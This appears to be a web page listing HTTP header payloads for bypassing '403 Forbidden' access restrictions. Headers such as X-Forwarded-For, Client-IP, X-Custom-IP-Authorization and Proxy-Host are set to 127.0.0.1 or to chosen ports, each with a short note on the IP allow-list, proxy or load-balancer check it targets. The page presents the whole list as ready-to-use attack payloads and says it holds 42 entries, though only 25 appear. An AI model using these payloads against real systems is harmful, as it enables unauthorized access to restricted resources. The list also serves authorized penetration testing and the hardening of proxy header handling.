403 Header Payloads
42 ready-to-use payloads
Base-Url
Override base URL to bypass IP restrictions
Base-Url: 127.0.0.1
Client-IP
Spoof client IP address for access bypass
Client-IP: 127.0.0.1
Http-Url
HTTP URL override header
Http-Url: 127.0.0.1
Proxy-Host
Proxy host spoofing for SSRF/403 bypass
Proxy-Host: 127.0.0.1
Proxy-Url
Proxy URL injection header
Proxy-Url: 127.0.0.1
Real-Ip
Real IP override for reverse proxy bypass
Real-Ip: 127.0.0.1
Redirect
Redirect target override
Redirect: 127.0.0.1
Referer
Referer header spoofing
Referer: 127.0.0.1
Referrer
Alternate referrer header spelling
Referrer: 127.0.0.1
Refferer
Misspelled referrer — catches lenient parsers
Refferer: 127.0.0.1
Request-Uri
Request URI override header
Request-Uri: 127.0.0.1
Uri
URI override for internal routing bypass
Uri: 127.0.0.1
Url
URL override header
Url: 127.0.0.1
X-Client-IP
Client IP via X-header for load balancer bypass
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization
Custom IP authorization header for cloud bypass
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For
Variant of X-Forwarded-For (missing -ed)
X-Forward-For: 127.0.0.1
X-Forwarded-By
Forwarded-by header for proxy chain bypass
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original
Original forwarded IP before proxy modifications
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For
Standard forwarded-for header — most common bypass
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host
Forwarded host override for virtual host bypass
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port-443
Forwarded port 443 for SSL termination bypass
X-Forwarded-Port: 443
X-Forwarded-Port-4443
Forwarded port 4443 for non-standard SSL
X-Forwarded-Port: 4443
X-Forwarded-Port-80
Forwarded port 80 for HTTP bypass
X-Forwarded-Port: 80
X-Forwarded-Port-8080
Forwarded port 8080 for proxy bypass
X-Forwarded-Port: 8080
X-Forwarded-Port-8443
Forwarded port 8443 for alt SSL bypass
X-Forwarded-Port: 8443